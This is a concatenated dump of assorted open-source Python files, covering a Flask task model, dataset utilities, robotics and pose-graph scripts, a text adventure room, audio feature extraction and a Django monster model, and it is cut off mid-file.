self.status = task['status']\n\n return True\n\n def update(self, stat):\n if not self.fetch_info():\n api.abort(404)\n db = get_db()\n self.status = stat\n db.execute(\n 'UPDATE task SET status = ? WHERE id = ?', (self.status, self.uid)\n )\n db.commit()\n return {\n 'message': 'successfully updated',\n 'task_details': self.to_json()\n }\n\n def add(self):\n db = get_db()\n db.execute(\n 'INSERT INTO task (title, description, status, due_date) VALUES (?,?,?,?)',\n (self.title, self.description, self.status, self.due_date)\n )\n db.commit()\n return {'message':\"task added successfully\"}\n\n def delete(self):\n db = get_db()\n task = db.execute(\n 'SELECT id FROM task WHERE id = ?', (self.uid,)\n ).fetchone()\n if not task:\n api.abort(404)\n db.execute(\n 'DELETE FROM task WHERE id = ?', (self.uid,)\n )\n db.commit()\n return {'message':'task removed successfully'}\n\n def to_json(self):\n return {\n 'id': self.uid,\n 'title': self.title,\n 'due date': self.due_date.strftime('%Y-%m-%d'),\n 'description': self.description,\n 'status': self.status\n }\n","sub_path":"app/main/model/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"396341870","text":"\"\"\"\nA set of utility functions to help with loading datasets.\n\"\"\"\nfrom typing import Any, Dict, List, Union\n\nfrom openff.qcsubmit.datasets.datasets import (\n BasicDataset,\n OptimizationDataset,\n TorsiondriveDataset,\n)\nfrom openff.qcsubmit.exceptions import DatasetRegisterError, InvalidDatasetError\nfrom openff.qcsubmit.serializers import deserialize\n\nregistered_datasets: Dict[str, Any] = {}\n\n\ndef load_dataset(data: Union[str, Dict]) -> \"BasicDataset\":\n \"\"\"\n Create a new instance dataset from the file or dict of the dataset. This removes the need of knowing what the dataset type is.\n\n Parameters:\n data: The file path or dict of the dataset from which we should load the data.\n\n Raises:\n DatasetRegisterError: If no registered dataset can load the given dataset type.\n\n Returns:\n An instance of the correct dataset loaded with the data.\n \"\"\"\n if isinstance(data, str):\n # load the file\n raw_data = deserialize(data)\n else:\n raw_data = data\n\n dataset_type = registered_datasets.get(raw_data[\"dataset_type\"].lower(), None)\n if dataset_type is not None:\n return dataset_type(**raw_data)\n else:\n raise DatasetRegisterError(\n f\"No registered dataset can load the type {dataset_type}.\"\n )\n\n\ndef register_dataset(dataset: Any, replace: bool = False) -> None:\n \"\"\"\n Register a dataset with qcsubmit making it easy to auto load the model from file.\n\n Parameters:\n dataset: The dataset class that should be registered.\n replace: If the new dataset should replace any other dataset of the same type\n\n Raises:\n InvalidDatasetError: If the dataset is not a valid sub class of the basic dataset model\n DatasetRegisterError: If a dataset of this type has already been registered\n \"\"\"\n\n if issubclass(dataset, BasicDataset):\n dataset_type = dataset.__fields__[\"dataset_type\"].default.lower()\n\n if dataset_type not in registered_datasets or (\n dataset_type in registered_datasets and replace\n ):\n registered_datasets[dataset_type] = dataset\n else:\n raise DatasetRegisterError(\n f\"A dataset was already registered with the type {dataset_type}, to replace this use the `replace=True` flag.\"\n )\n\n else:\n raise InvalidDatasetError(\n f\"Dataset {dataset} rejected as it is not a valid sub class of the BasicDataset.\"\n )\n\n\ndef list_datasets() -> List[str]:\n \"\"\"\n Returns:\n A list of all of the currently registered dataset classes.\n \"\"\"\n return list(registered_datasets.values())\n\n\nregister_dataset(BasicDataset)\nregister_dataset(OptimizationDataset)\nregister_dataset(TorsiondriveDataset)\n","sub_path":"openff/qcsubmit/datasets/dataset_utils.py","file_name":"dataset_utils.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"516906974","text":"import os\nimport gzip\nimport json\nimport urllib3\n\nclass City (object):\n id: int\n name: str\n country: str\n\n def __init__(self, json_dict: dict):\n self.id = int(json_dict['id'])\n self.name = json_dict['name']\n self.country = json_dict['country']\n\n def __str__(self):\n return f\"ID #{self.id}, City: {self.name}, Country: {self.country}\"\n\n def __repr__(self):\n return self.__str__()\n\n @staticmethod\n def download_archive(url: str, destination_folder: str):\n archive_file = os.path.join(destination_folder, 'cities.gz')\n json_file = os.path.join(destination_folder, 'cities.json')\n\n if not os.path.exists(archive_file):\n print(\"Downloading cities archive from OpenWeather ...\")\n\n http = urllib3.PoolManager()\n request_content = http.request('GET', url, preload_content=False)\n\n with open(archive_file, 'wb') as gzip_file:\n for part in request_content.stream(128):\n gzip_file.write(part)\n\n request_content.release_conn()\n \n decompressed_content = gzip.open(archive_file).read()\n\n with open(json_file, 'wb') as json_output:\n json_output.write(decompressed_content)\n\n @staticmethod\n def get_list(export_dir: str):\n new_cities = []\n\n with open(os.path.join(export_dir, 'cities.json')) as json_file:\n json_data = json.load(json_file)\n\n for item in json_data:\n city = City(item)\n new_cities.append(city)\n\n return new_cities\n","sub_path":"lesson08/solution/libs/city.py","file_name":"city.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"27642782","text":"import json\nimport math\n#import PyKDL\n#import mathutils\nimport transformations\nimport numpy\n\ndef get_dh():\n file = open('Macierz_MD-G.json', 'r')\n dh = json.loads(file.read())\n return dh\n \n\ndef write_yaml(xyz, rpy, row, a, file, d):\n file.write(row + \":\\n\")\n if(row == \"row1\"):\n file.write(\" joint_xyz: \"+str(xyz[0])+\" \"+str(xyz[1])+\" \"+str(xyz[2]+1)+\"\\n\")\n else:\n file.write(\" joint_xyz: \"+str(xyz[0])+\" \"+str(xyz[1])+\" \"+str(xyz[2])+\"\\n\")\n \n file.write(\" joint_rpy: \"+str(rpy[0])+' '+str(rpy[1])+' '+str(rpy[2])+'\\n')\n file.write(\" link_xyz: \"+str(0)+' '+str(0)+' '+str(float(d)*(-0.5))+'\\n')\n file.write(\" link_rpy: \"+str(0)+' '+str(0)+' '+str(0)+'\\n')\n file.write(\" link_len: \"+str(d)+'\\n')\n\ndef get_xyz_rpy():\n\n\n# with open(\"dh_params.json\", \"r\") as file:\n# dh_params = json.load(file)\n\n dh = get_dh()\n \n yaml_file = open('urdf_wyniki.yaml', 'w')\n\n \n# rpy_xyz={}\n# inter = 1\n# iterator = 1\n\n# xyz_array = []\n# rpy_array = []\n# params_array = []\n\n for row in dh.keys():\n # dh_row = json.loads(json.dumps(row))\n a, d, alpha, theta = dh[row]\n #a_translation = transformations.translation_matrix((dh_row[\"a\"],0,0))\n #d_translation = transformations.translation_matrix((0,0,dh_row[\"d\"]))\n #alpha_rotation = transformations.rotation_matrix(dh_row[\"alpha\"],(1, 0, 0))\n #theta_rotation = transformations.rotation_matrix(dh_row[\"theta\"],(0, 0, 1))\n \n a_translation = transformations.translation_matrix((float(a),0,0))\n d_translation = transformations.translation_matrix((0,0,float(d)))\n alpha_rotation = transformations.rotation_matrix(float(alpha),(1, 0, 0))\n theta_rotation = transformations.rotation_matrix(float(theta),(0, 0, 1))\n \n trans_matrix = a_translation @ alpha_rotation @ theta_rotation @ d_translation\n rpy = transformations.euler_from_matrix(trans_matrix)\n xyz = transformations.translation_from_matrix(trans_matrix)\n # zapis danych\n write_yaml(xyz, rpy, row, a, yaml_file, d)\n\nif __name__ == '__main__':\n get_xyz_rpy()\n","sub_path":"anro3/urdf/dh_to_rpy.py","file_name":"dh_to_rpy.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"552865851","text":"\"\"\"Example for solving pose graph optimization problems loaded from `.g2o` files.\n\nFor a summary of options:\n\n python pose_graph_g2o.py --help\n\n\"\"\"\nimport argparse\nimport dataclasses\nimport enum\nimport pathlib\n\nimport _g2o_utils\nimport datargs\nimport matplotlib.pyplot as plt\n\nimport jaxfg\n\n\nclass SolverType(enum.Enum):\n GAUSS_NEWTON = jaxfg.solvers.GaussNewtonSolver()\n FIXED_ITERATION_GAUSS_NEWTON = jaxfg.solvers.FixedIterationGaussNewtonSolver(\n unroll=False\n )\n LEVENBERG_MARQUARDT = jaxfg.solvers.LevenbergMarquardtSolver()\n DOGLEG = jaxfg.solvers.DoglegSolver()\n\n @property\n def value(self) -> jaxfg.solvers.NonlinearSolverBase:\n \"\"\"Typed override for `enum.value`.\"\"\"\n value = super().value\n assert isinstance(value, jaxfg.solvers.NonlinearSolverBase)\n return value\n\n\n@datargs.argsclass(\n parser_params={\"formatter_class\": argparse.ArgumentDefaultsHelpFormatter}\n)\n@dataclasses.dataclass\nclass CliArgs:\n g2o_path: pathlib.Path = datargs.arg(\n positional=True,\n nargs=\"?\",\n default=pathlib.Path(__file__).parent / \"data/input_M3500_g2o.g2o\",\n help=\"Path to g2o file.\",\n )\n solver_type: SolverType = datargs.arg(\n default=SolverType.GAUSS_NEWTON,\n help=\"Nonlinear solver to use.\",\n )\n\n\ndef main():\n # Parse CLI args\n cli_args = datargs.parse(CliArgs)\n\n # Read graph\n with jaxfg.utils.stopwatch(\"Reading g2o file\"):\n g2o: _g2o_utils.G2OData = _g2o_utils.parse_g2o(cli_args.g2o_path)\n\n # Make factor graph\n with jaxfg.utils.stopwatch(\"Making factor graph\"):\n graph = jaxfg.core.StackedFactorGraph.make(g2o.factors)\n\n with jaxfg.utils.stopwatch(\"Making initial poses\"):\n initial_poses = jaxfg.core.VariableAssignments.make_from_dict(g2o.initial_poses)\n\n # Time solver\n if not isinstance(\n cli_args.solver_type.value, jaxfg.solvers.FixedIterationGaussNewtonSolver\n ):\n # `max_iterations` field exists for all solvers but the fixed iteration GN\n with jaxfg.utils.stopwatch(\"Single-step JIT compile + solve\"):\n solution_poses = graph.solve(\n initial_poses,\n solver=dataclasses.replace(\n cli_args.solver_type.value, max_iterations=1\n ),\n )\n solution_poses.storage.block_until_ready()\n\n with jaxfg.utils.stopwatch(\"Single-step solve (already compiled)\"):\n solution_poses = graph.solve(\n initial_poses,\n solver=dataclasses.replace(\n cli_args.solver_type.value, max_iterations=1\n ),\n )\n solution_poses.storage.block_until_ready()\n\n with jaxfg.utils.stopwatch(\"Full solve\"):\n solution_poses = graph.solve(initial_poses, solver=cli_args.solver_type.value)\n solution_poses.storage.block_until_ready()\n\n # Plot\n plt.figure()\n\n # Visualize 2D poses\n if isinstance(\n next(iter(solution_poses.get_variables())), jaxfg.geometry.SE2Variable\n ):\n plt.plot(\n *(\n initial_poses.get_stacked_value(jaxfg.geometry.SE2Variable)\n .translation()\n .T\n ),\n # Equivalent:\n # *(onp.array([initial_poses.get_value(v).translation() for v in pose_variables]).T),\n c=\"r\",\n label=\"Initial\",\n )\n plt.plot(\n *(\n solution_poses.get_stacked_value(jaxfg.geometry.SE2Variable)\n .translation()\n .T\n ),\n # Equivalent:\n # *(onp.array([solution_poses.get_value(v).translation() for v in pose_variables]).T),\n c=\"b\",\n label=\"Optimized\",\n )\n\n # Visualize 3D poses\n elif isinstance(\n next(iter(solution_poses.get_variables())), jaxfg.geometry.SE3Variable\n ):\n ax = plt.axes(projection=\"3d\")\n ax.set_box_aspect((1, 1, 1))\n ax.plot3D(\n *(\n initial_poses.get_stacked_value(jaxfg.geometry.SE3Variable)\n .translation()\n .T\n ),\n c=\"r\",\n label=\"Initial\",\n )\n ax.plot3D(\n *(\n solution_poses.get_stacked_value(jaxfg.geometry.SE3Variable)\n .translation()\n .T\n ),\n c=\"b\",\n label=\"Optimized\",\n )\n\n else:\n assert False\n\n plt.title(f\"Optimization on {cli_args.g2o_path.stem}\")\n plt.legend()\n plt.show()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/pose_graph_g2o.py","file_name":"pose_graph_g2o.py","file_ext":"py","file_size_in_byte":4619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"30582419","text":"import sys\r\nfrom math import ceil\r\nsys.stdin = open(\"swap.in\", 'r')\r\nfor _ in range(int(input())):\r\n n = int(input())\r\n x = [int(i) for i in input().split()]\r\n c = 0\r\n for i in range(1, n+1):\r\n if i == x[i-1]:\r\n c += 1\r\n d = c //2 + c%2\r\n print(d)\r\n","sub_path":"G.py","file_name":"G.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"356896632","text":"class employee:\r\n def __init__(self):\r\n self.firstname=\"xyz\"\r\n self.lastname=\"abc\"\r\n self.salary=0.0\r\n def get(self,fn,ln,s):\r\n self.firstname=fn\r\n self.lastname=ln\r\n if(s>0):\r\n self.salary=s\r\n else:\r\n print(\"Invalid salary\")\r\n self.salary=input(\"enter again\")\r\n def show(self):\r\n print(\"First Name = \",self.firstname)\r\n print(\"Second Name = \", self.lastname)\r\n print(\"Salary = \", self.salary)\r\n def rais(self):\r\n self.salary=self.salary+self.salary/10\r\ne1=employee()\r\ne2=employee()\r\nn=input(\"enter first name for e1 \")\r\nl=input(\"enter last name for e1 \")\r\ns=int(input(\"enter salary for e1 \"))\r\ne1.get(n,l,s)\r\nn=input(\"enter first name for e2 \")\r\nl=input(\"enter last name for e2 \")\r\ns=int(input(\"enter salary for e2 \"))\r\ne2.get(n,l,s)\r\ne1.show()\r\ne2.show()\r\nprint(\"After 10% raise\")\r\ne1.rais()\r\ne2.rais()\r\ne1.show()\r\ne2.show()\r\n\r\n\r\n","sub_path":"employee 2.py","file_name":"employee 2.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"220188172","text":"import sys\nimport matplotlib.pyplot as plt \nfrom decimal import Decimal, DecimalException\n\nfor j in range(1, len(sys.argv)):\n f = open(sys.argv[j])\n print(\"Opened argv number\", j, sys.argv[j])\n\n for i, l in enumerate(f):\n pass\n f = open(sys.argv[j])\n\n gps_lat_arr = [0] * (i + 1)\n gps_long_arr = [0] * (i + 1)\n\n lineDict = {}\n\n idx = 0\n for line in f:\n lineDict[idx] = line.split(\",\")\n try:\n gps_lat_arr[idx] = Decimal(lineDict[idx][0])\n gps_long_arr[idx] = Decimal(lineDict[idx][1])\n except DecimalException as f:\n continue\n idx = idx+1\n\n plt.plot(gps_long_arr, gps_lat_arr);\n plt.xlabel('lat')\n plt.ylabel('long')\n plt.title('lat v long')\n plt.show()","sub_path":"test_data/modified data/may29_bay/gps_plot.py","file_name":"gps_plot.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"500299915","text":"#!/usr/bin/env python \n\n## game/bedroom.py\n## ---\n## The class for representing the bedroom area in the game, along with the logic needed for each action.\n## Benjamin Williams \n##\n\n#Import referenced areas (connected)\nimport game.kitchen\n\n#Import utility classes\nfrom game.area import Area\nfrom game.util import sprint\nimport re;\n\n## The class for representing the bedroom area within the game.\nclass Bedroom(Area):\n\t\n\t#Static regex to match the entry string for this area.\n\tmatch = \".*(bedr\\w+).*\";\n\t\n\t#And the in/out bed states (whether the game has began or not)\n\tSTATE_IN_BED = 0;\n\tSTATE_OUT_OF_BED = 1;\n\t\n\t## Constructor for the bedroom class\n\tdef __init__(self, name):\n\t\n\t\t#Call superclass constructor\n\t\tsuper(Bedroom, self).__init__(name);\n\t\t\n\t\t#Set up introductory text (when the game is first ran).\n\t\tself.introText = \"\"\"\nYou wake up to the sounds of pigs outside, and the morning sun warming your face. This is a typical day for you, as a pig farmer. You are laying on your bed, fully awake. You need to get up out of bed to start your daily chores.\"\"\";\n\t\t\n\t\t#And the state of whether or not they're in bed, along with the note status\n\t\tself.state = self.STATE_IN_BED;\n\t\tself.noteBurned = False;\n\t\n\t## Checks whether or not the user can move to a specific area in this context of the current area.\n\tdef canMoveToArea(self, area):\n\n\t\t#If they want to go into the kitchen, they must be out of bed:\n\t\tif re.search(game.kitchen.Kitchen.match, area, re.IGNORECASE):\n\t\t\tif self.state == self.STATE_OUT_OF_BED:\n\t\t\t\treturn None;\n\t\t\n\t\t#Otherwise just return an error message.\n\t\treturn \"You cannot go here at this time.\";\n\t\t\n\t## Prints the introductory text\n\tdef printIntro(self):\n\t\n\t\t#If the game has just started, print the initial preamble out\n\t\tif self.state == self.STATE_IN_BED:\n\t\t\tsprint(self.introText);\n\t\t\t\n\t\t#Otherwise print the normal introductory text (when the area comes into focus)\n\t\telse:\n\t\t\tsprint(\"You enter the bedroom, there is a door to the kitchen, a mysterious note addressed to you and a mirror on the wall.\");\n\t\n\t## Matches each action against the user's input from stdin\n\tdef matchText(self, text):\n\t\t\n\t\tif self.state == self.STATE_IN_BED:\n\t\t\n\t\t\t#If they're in bed, and they wish to get out of bed:\n\t\t\tif re.match(r\"get\\s+(up|out)\\s*(from|out)?(of\\s+(the)?\\s+bed)?\", text, re.IGNORECASE):\n\t\t\t\tsprint(\"You got out of the bed. You look into a mirror and reel in horror - you've turned into the very pigs that you farm! Is this karma? An act of god? Why has this happened?\" + \n\t\t\t\t\"\\r\\n\\r\\nThinking to yourself, you must find out why you have turned into a pig with four trotters, a snout and a curly tail. You make an oath to search for the reason why this has happened, \" + \n\t\t\t\t\"and vow to return yourself to your normal human form.\", 0.005);\n\t\t\t\t\n\t\t\t\tsprint(\"\\r\\nYou look around for clues as to why this has happened. You are in a shack-like bedroom, with rustic memorabilia coating every inch of the walls. In the corner is the doorway to the\" + \n\t\t\t\t\" kitchen, and a mysterious note addressed to you is on your bedside drawer, next to a dimly-lit candle. There is also a mirror on the wall.\", 0.01);\n\t\t\t\t\n\t\t\t\t#Set their state to out of bed\n\t\t\t\tself.state = self.STATE_OUT_OF_BED;\n\t\t\t\t\n\t\t\t#Otherwise, call an invalid action - they can only get out of bed at this point.\n\t\t\telse:\n\t\t\t\tsuper(Bedroom, self).invalid_action();\n\t\t\t\n\t\t#Otherwise, they're out of bed:\n\t\telse:\n\t\t\t\n\t\t\t#If they wish to read the note:\n\t\t\tif re.match(r\"(look|read|take|pick)\\s+.*?(note|letter)\", text, re.IGNORECASE):\n\t\t\t\n\t\t\t\t#Is it burned? If not, read it out\n\t\t\t\tif not self.noteBurned:\n\t\t\t\t\tsprint(\"You read the note which is addressed to you. It says:\\r\\n\");\n\t\t\t\t\tsprint(\"\\\"Oink, oink oink oink, oink oink oink. Oink, Oink oink oink oink. Oink? Oink, oink, oink! - oink\\\"\");\n\t\t\t\t\tsprint(\"\\r\\nYou realise this note isn't of much use.\");\n\t\t\t\t\t\n\t\t\t\t#Otherwise tell them its burnt :(\n\t\t\t\telse:\n\t\t\t\t\tsprint(\"You try to read the note, but it is too badly burnt.\");\n\t\t\t\t\t\n\t\t\t#If they wish to burn the note \n\t\t\telif re.match(r\"burn\\s+.*?(note|letter)\", text, re.IGNORECASE):\n\t\t\t\tif self.noteBurned:\n\t\t\t\t\tsprint(\"You try to burn the note, only to notice that it's already burnt to a crisp.\");\n\t\t\t\telse:\n\t\t\t\t\tsprint(\"You burn the note by holding it next to the candle with your mouth. It burns for a few seconds, and eventually releases a plume of smoke.\");\n\t\t\t\t\tself.noteBurned = True;\n\t\t\t\t\t\n\t\t\t#If they want to look into the mirror\n\t\t\telif re.match(r\"look\\s+(in|at).*?\\s+mirror\", text, re.IGNORECASE):\n\t\t\t\tprint(\nr\"\"\"\n ___\n ',_`\"\"\\ .---,\n \\ :-\"\"``/` |\n `;' //`\\ /\n / __ | ('.\n |_ ./O)\\ \\ `) \\\n _/-. ` `\"` |`-.\n .-=; ` / `-.\n /o o \\ ,_, . '.\n L._._;_.-' . `'-.\n `'-.` ' `'-.\n `. ' `-._\n '-._. -' '.\n \\ `\\\n | \\\n | | ; _.\n \\ | | |-.((\n ;. \\ / / |-.`\\)\n | '. ; / | |(_) )\n | \\ \\ /` | ;'--'\n \\ '.\\ /` | /\n | /`| ; \\ /\n | | | |-._ '. .'\n / | | |__.`'---\"_;'-. .-'\n //__/ / | .-'`` _.-'`\n //__/ //___.--''` \n\n\"\"\");\n\t\t\t\tsprint(\"You look at yourself and think \\\"Wow, I nearly look good enough to eat!\\\".\");\n\t\t\t\t\n\t\t\t#The global command for looking around the current area, for this specific area.\n\t\t\telif re.match(r\"look around\", text, re.IGNORECASE):\n\t\t\t\tsprint(\"You are in a shack-like bedroom, with rustic memorabilia coating every inch of the walls. In the corner is the doorway to the\" + \n\t\t\t\t\" kitchen, and a mysterious note addressed to you is on your bedside drawer, next to a dimly-lit candle. There is also a mirror on the wall.\");\n\t\t\t\n\t\t\t#Otherwise an invalid action was encountered:\n\t\t\telse:\n\t\t\t\tsuper(Bedroom, self).invalid_action();\n\t\t","sub_path":"project/game/bedroom.py","file_name":"bedroom.py","file_ext":"py","file_size_in_byte":6418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"532981731","text":"'''\nrough script for rendering two glyphs onto dna backbone\nneed to be moved outside the example directory \nat the same directory as render.py\n'''\n\nimport matplotlib.pyplot as plt\nimport render\n\n\n\ndef main():\n\tprint('executed')\n\tfig = plt.figure(figsize=(5,5))\n\tax = fig.add_subplot(111)\n\t# need to set axis first \n\tax.set_xlim(-50.0, 50.0)\n\tax.set_ylim(-50.0, 50.0)\n\n\tstrand = render.StrandRenderer()\n\trenderer = render.GlyphRenderer()\n\tp1 = renderer.draw_glyph(ax, 'Promoter', (-20.0, 0.0), 5., 0)\n\ti3 = renderer.draw_glyph(ax, 'Insulator', (20.0, -2.5), 5., 0.)\n\tstrand.add_glyphs([p1, i3])\n\tstrand.draw_backbone_strand(ax, 0.0, 2)\n\n\tax.set_axis_off()\n\tplt.show()\n\n\nif __name__ == '__main__':\n\tprint('what')\n\tmain()\n\n\n","sub_path":"dnaplotlib/examples/backbone.py","file_name":"backbone.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"203906669","text":"import shutil\nimport textwrap\nimport unicodedata\nfrom collections import defaultdict\n\nimport requests\nfrom blessed import Terminal\nfrom hrepr import HTML\nfrom tqdm import tqdm\n\nH = HTML()\nT = Terminal()\ntw = shutil.get_terminal_size((80, 20)).columns\n\n\nclass PaperoniError(Exception):\n pass\n\n\ndef print_field(title, contents, bold=False):\n \"\"\"Prints a line that goes 'title: contents', nicely formatted.\"\"\"\n contents = textwrap.fill(f\"{title}: {contents}\", width=tw)[len(title) + 2 :]\n title = T.bold_cyan(f\"{title}:\")\n contents = T.bold(contents) if bold else contents\n print(title, contents)\n\n\ndef join(elems, sep=\", \", lastsep=None):\n \"\"\"Create a list using the given separators.\n\n If lastsep is None, lastsep = sep.\n\n Returns:\n [elem0, (sep, elem1), (sep, elem2), ... (lastsep, elemn)]\n \"\"\"\n if lastsep is None:\n lastsep = sep\n elems = list(elems)\n if len(elems) <= 1:\n return elems\n results = [elems[0]]\n for elem in elems[1:-1]:\n results.extend((H.raw(sep), elem))\n results.extend((H.raw(lastsep), elems[-1]))\n return results\n\n\ndef download(url, filename):\n \"\"\"Download the given url into the given filename.\"\"\"\n print(f\"Downloading {url}\")\n r = requests.get(url, stream=True)\n total = int(r.headers.get(\"content-length\") or \"1024\")\n with open(filename, \"wb\") as f:\n with tqdm(total=total) as progress:\n for chunk in r.iter_content(chunk_size=total // 100):\n f.write(chunk)\n f.flush()\n progress.update(len(chunk))\n print(f\"Saved {filename}\")\n\n\ndef asciiify(s):\n \"\"\"Translate a string to pure ASCII, removing accents and the like.\n\n Non-ASCII characters that are not accented characters are removed.\n \"\"\"\n norm = unicodedata.normalize(\"NFD\", s)\n stripped = norm.encode(\"ASCII\", \"ignore\")\n return stripped.decode(\"utf8\")\n\n\ndef group_by(papers, key):\n \"\"\"Group a sequence by the result of a key function.\"\"\"\n groups = defaultdict(list)\n for p in papers:\n groups[key(p)].append(p)\n return groups\n\n\ndef normalize(s):\n if s is None:\n return None\n else:\n return asciiify(s).lower()\n","sub_path":"paperoni/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"424103123","text":"__author__ = 'lewiskit'\n\n\nfrom audioExt import AudioExtract\nfrom genAudioFeatures import GenAudFea\nfrom audioOfTalk import AudioOfTalk\n\n\n# the absolute path of video, this one is better than the synced one\nor_path_complete = \"/usr1/RapportVideo/ConvertedMP4\"\n\n# output path of the audio, split audio and audio features extracted from openSMILE\nout_path_10 = \"/usr0/proj/Research/Projects/Rapport/_RawData/Audio/or_audio_all_6s\"\n\n# absolute path of binary openSMILE toolkit\nsmile_path = '/usr0/home/lfenng/openSMILE-2.1.0'\n\n# the audio feature set, this set is The INTERSPEECH 2010 Paralinguistic Challenge feature set\nconfig_name = 'IS10_paraling.conf'\n\n# time of split audio or video\ntimestamp = 6\n\n'''\nConstructor\n:param absolute path of original video data\n:param output dir of audio, split audio, audio features\n:param time stamp\n'''\n# auoExt = AudioExtract(or_path_complete, out_path_10, timestamp=timestamp)\n\n'''\nExtract total audio from video processing\n'''\n# auoExt.gen_audio_process()\n\n'''\nExtract split audio from the former extracted audio\n'''\n# auoExt.gen_split_audio_process()\n\n\n\"\"\"\n generated features from split audio\n\"\"\"\n\n'''\nConstructor\n:param openSMILE toolkit path\n:param the absolute path of audio files, and the extracted files would be the same directory\n:param feature set to use\n'''\n# genAudFeature = GenAudFea(smile_path, out_path_10, config_name)\n\n'''\nGenerating new features dataSet\n'''\n# genAudFeature.gen_feature_process()\n\n\n\"\"\"\nThe following is an additional function: to split videos into timestamp video\nCurrently it is of no use.\n\"\"\"\n\nout_dir = '/usr0/proj/Research/Projects/Rapport/_RawData/Video/split_video'\n'''\nve = VideoExtract(or_path, out_dir, timestamp)\nve.gen_split_process()\n'''\n\npoint_dir = '/usr0/home/lfenng/mix-sd'\n# '/Users/lewiskit/Downloads/mix-sd'\n\n\nworkspace = '/usr0/home/lfenng/talkAudio'\n\n# directory names of the original videos, since it is not a continuous processing, just enum each of them\ndir_names = ['Dyad09',\n 'Dyad10', 'Dyad13']\n\n# the same function as below\nst_names = ['D9', 'D10', 'D13']\n\n\naudioOfTalk = AudioOfTalk(point_dir, or_path_complete, workspace, smile_path, 3, config_name,dir_names,st_names)\naudioOfTalk.get_audio_process()\n\n\n","sub_path":"ExtractFeatures/testExt3.py","file_name":"testExt3.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"188296001","text":"\"\"\"MS file parsing tests\r\nThe Dataframe returned after the parsing is huge and hence it is\r\ncumbersome to check for the correctness of each and every value.\r\nTherefore, a check is made only on the object type and its dimensionality\r\n\"\"\"\r\n\r\nfrom ms_file_parsing import MSFileParser\r\nimport os\r\nimport pandas as pd\r\nTEST_FOLDER = os.path.dirname(__file__)\r\nMS_FILE_PATH_mzML = os.path.join(TEST_FOLDER, \"data/tiny.pwiz.1.1.mzML\")\r\nMS_FILE_PATH_mzXML = os.path.join(TEST_FOLDER, \"data/raftflow10.mzXML\")\r\n\r\nclass TestMSFileParser:\r\n \"\"\"Unit tests for the MSFileParser class.\"\"\"\r\n\r\n def test_parser(self):\r\n \"\"\"Checks whether the MSFileParser class correctly extracts the required attributes\"\"\"\r\n\r\n # test for mzML file\r\n parsing_instance_mzML = MSFileParser(ms_file_input=MS_FILE_PATH_mzML)\r\n output_mzML = parsing_instance_mzML.parser()\r\n output_mzML_shape = output_mzML.shape\r\n assert isinstance(output_mzML,pd.DataFrame) # check for returned output is a dataframe\r\n assert output_mzML_shape == (3,5) # check for correct dimension\r\n\r\n # test for mzXML file\r\n parsing_instance_mzXML = MSFileParser(ms_file_input=MS_FILE_PATH_mzXML)\r\n output_mzXML = parsing_instance_mzXML.parser()\r\n output_mzXML_shape = output_mzXML.shape\r\n assert isinstance(output_mzXML, pd.DataFrame) # check for returned output is a dataframe\r\n assert output_mzXML_shape == (4064, 5) # check for correct dimension\r\n\r\n\r\n","sub_path":"MS_Project/spectra_package/tests/test_ms_file_parsing.py","file_name":"test_ms_file_parsing.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"647638145","text":"import re\nfrom django.core.validators import MinValueValidator, MaxValueValidator\nfrom django.db import models\n\n\ndef decimal_to_str(decimal):\n if not decimal:\n return None\n in_num = False\n num_str = \"\"\n for d in str(decimal)[::-1]:\n if not in_num:\n if d == \".\":\n in_num = True\n continue\n if d == \"0\":\n continue\n\n in_num = True\n num_str += d\n return num_str[::-1]\n\n\nclass Monster(models.Model):\n class Meta:\n verbose_name = 'Monster'\n verbose_name_plural = 'Monster'\n ordering = ['id']\n\n bild = models.ImageField(blank=True, null=True)\n\n name = models.CharField(max_length=100, default='', unique=True)\n rang = models.IntegerField(null=True, blank=True, validators=[MinValueValidator(-1000000), MaxValueValidator(1000000)])\n größe = models.DecimalField('größe', max_digits=6, decimal_places=3, validators=[MinValueValidator(0)], null=True, blank=True)\n gewicht = models.DecimalField('gewicht', max_digits=8, decimal_places=3, validators=[MinValueValidator(0)], null=True, blank=True)\n hp = models.IntegerField(null=True, blank=True)\n schadensverhinderung = models.CharField(max_length=20, null=True, blank=True)\n habitat = models.TextField(max_length=1000, null=True, blank=True)\n beschreibung = models.TextField(max_length=3000, null=True, blank=True)\n\n attacken = models.ManyToManyField(\"Attacke\", blank=True)\n typen = models.ManyToManyField(\"Typ\", blank=True)\n\n def bild_url(self):\n if self.bild and hasattr(self.bild, 'url'):\n return self.bild.url\n else:\n return '/media/files/atom.png'\n\n def rangordnung(self):\n return_generationen = ''\n return_stufen = ''\n return_str = ''\n\n rang = self.rang\n if rang is None: return None\n\n # value itself and higher, starting at the top\n generationen = [(1000000, \"S\"), (100000, \"E\"), (10000, \"A\"), (1000, 